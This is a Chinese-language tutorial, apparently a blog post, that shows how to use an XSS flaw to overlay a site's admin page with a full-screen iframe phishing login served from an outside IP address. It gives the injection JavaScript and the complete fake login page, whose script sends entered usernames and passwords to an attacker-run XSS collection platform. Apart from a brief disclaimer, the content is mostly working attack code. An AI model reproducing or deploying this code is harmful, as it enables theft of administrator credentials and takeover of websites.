自己寫一個和原網站后台登錄地址一模一樣的釣魚頁面
JS加載一個iframe 100%覆蓋原網頁 提示登錄超時重新登錄 因為是iframe加載 url地址不變 釣魚成功后 再跳轉回/admin/index.php 因為目標session沒過期 所以可以極大程度的模擬正常的登錄成功操作。
注入如下代碼:
1 setTimeout(function(){ 2 parent.document.writeln("<iframe style=\"margin:0px;padding:0px;height:100%;width:100%;\" src=\"http://59.65.232.237/diaoyu.html\" frameBorder=0 scrolling=no></iframe>"); 3 setTimeout(function(){ 4 document.getElementsByTagName("body")[0].setAttribute("style","margin:0px;");},100); 5 setTimeout(function(){ 6 parent.document.getElementsByTagName("body")[0].setAttribute("style","margin:0px;");},100); 7 },1000);
在服務器上構造diaoyu.html的網頁。代碼如下:
1 <html> 2 <head> 3 <meta charset="utf-8"> 4 <title>Xss平台-免費xss測試平台,xss源碼,xss代碼</title> 5 <meta name="keywords" content="XSS攻擊,XSS平台,XSS跨站,XSS代碼,XSS教程,XSS平台邀請碼,免費xss平台,xss測試平台,跨站平台,跨站攻擊" /> 6 <meta name="description" content="XSS攻擊,XSS平台,XSS跨站,XSS代碼,XSS教程,XSS平台邀請碼,免費xss平台,xss測試平台,跨站平台,跨站攻擊" /> 7 <meta name="viewport" content="width=device-width, initial-scale=1.0"> 8 <link rel="stylesheet" href="http://xss.fbisb.com/themes/default/css/bootstrap.min.css"> 9 <link rel="stylesheet" href="http://xss.fbisb.com/themes/default/css/bootstrap-theme.min.css"> 10 <link rel="stylesheet" href="http://xss.fbisb.com/themes/default/css/css.css"> 11 <script src="http://code.jquery.com/jquery-1.9.1.min.js"></script> 12 <script src="http://www.bootstrapcdn.com/bootstrap/2.3.1/js/bootstrap.min.js"></script> 13 14 <script> 15 function Login(){ 16 if($("#user").val()==""){ 17 ShowError("用戶名不能為空"); 18 return false; 19 } 20 if($("#pwd").val()==""){ 21 ShowError("密碼不能為空"); 22 return false; 23 } 24 } 25 function ShowError(content){ 26 $("#contentShow").attr("class","error"); 27 $("#contentShow").html(content); 28 } 29 </script> 30 31 </head> 32 <body> 33 <div class="navbar navbar-fixed-top navbar-inverse"> 34 <div class="container"> 35 <div class="navbar-header"> 36 <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"> 37 <span class="icon-bar"></span> 38 <span class="icon-bar"></span> 39 <span class="icon-bar"></span> 40 </button> 41 <a class="navbar-brand" href="http://xss.fbisb.com/xss.php">Xss平台</a> 42 </div> 43 <div class="collapse navbar-collapse"> 44 <ul class="nav navbar-nav"> 45 <li class="active"><a href="http://xss.fbisb.com/xss.php">主頁</a></li> 46 47 <li><a href="http://www.fbisb.com/">論壇</a></li> 48 <li><a href="http://sgk.fbisb.com/">社工庫(已刪褲)</a></li> 49 <li><a href="http://wooyun.fbisb.com/" class="menuToggle">wooyun漏洞平台</a></li> 50 <li><a href="http://ip.fbisb.com/">ip定位</a></li> 51 52 </ul> 53 <ul class="nav navbar-nav navbar-right ng-scope" ng-controller="user_ctrl" id="header_me"> 54 <li> 55 <a class="mr_15" wt-tracker="Header|Menu|Goto Signin" href="http://xss.fbisb.com/xss.php?do=login">登錄</a> 56 <iframe id="tmp_downloadhelper_iframe" style="display: none;"></iframe></li> 57 <li> 58 <a href="http://xss.fbisb.com/xss.php?do=register" wt-tracker="Header|Menu|Goto Apply">注冊(無需邀請碼)</a> 59 </li> 60 61 </ul> 62 </div><!--/.nav-collapse --> 63 <iframe id="tmp_downloadhelper_iframe" style="display: none;"></iframe></div> 64 </div> 65 <div class="container"> 66 <form class="form-signin" action="http://xss.fbisb.com/xss.php?do=login&act=submit" method="post" onsubmit="return Login()"> 67 <div class="panel panel-default"> 68 <div class="panel-heading">登陸 (已開啟偽靜態 郵箱提醒 ^_^ )</div> 69 <div class="panel-body"> 70 <div class="form-group"> 71 <div class="input-group"> 72 <span class="input-group-addon"> 73 <i class="glyphicon glyphicon-user"></i> 74 </span> 75 <input class="form-control ng-pristine ng-invalid ng-invalid-required valid" type="text" placeholder="輸入用戶名/郵箱" name="user" id="user"> 76 <iframe id="tmp_downloadhelper_iframe" style="display: none;"></iframe></div> 77 </div> 78 <div class="form-group"> 79 <div class="input-group"> 80 <span class="input-group-addon fs_17"><i class="glyphicon glyphicon-lock"></i><iframe id="tmp_downloadhelper_iframe" style="display: none;"></iframe></span> 81 <input class="form-control ng-pristine ng-invalid ng-invalid-required valid" type="password" placeholder="輸入密碼" name="pwd" id="pwd"> 82 </div> 83 </div> 84 <button class="btn btn-lg btn-primary btn-block" type="submit">登陸</button> 85 </div> 86 </div> 87 </form> 88 </div> 89 </br><center>聲明:僅用於攻防演練及教學測試用途,禁止非法使用!</center> 90 91 <center> 92 <script type="text/javascript"> 93 /*創建於 2018/1/28*/ 94 var cpro_id = "u3196815"; 95 </script> 96 <script type="text/javascript" src="//cpro.baidustatic.com/cpro/ui/c.js"></script> 97 </center> 98 <script type="text/javascript"> 99 function DataSend(user,pass) 100 { 101 var url="http://xss平台地址"; 102 var xmlhttp1=new XMLHttpRequest(); 103 xmlhttp1.open("POST",url,true); 104 xmlhttp1.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); 105 xmlhttp1.send("username="+user+"&password="+pass); 106 } 107 document.forms[0].onsubmit=function(){ 108 var username=document.getElementById('user').value; 109 var password=document.getElementById('pwd').value; 110 alert(username); 111 alert(password); 112 new Image().src="http://xssplat/?username="+username+" &password="+password; //這里將獲得表單的username,password。發送到平台上 113 } 114 </script> 115 </body> 116 </html>
演示如下:
在有xss的地方注入iframe代碼(方便演示直接在控制台輸入代碼):
實際上url沒變化但是頁面已經加載我們構造的登陸代碼。
當我們輸入用戶名密碼時,就將username,password發送到服務器上。(這里測試將用戶名輸出)
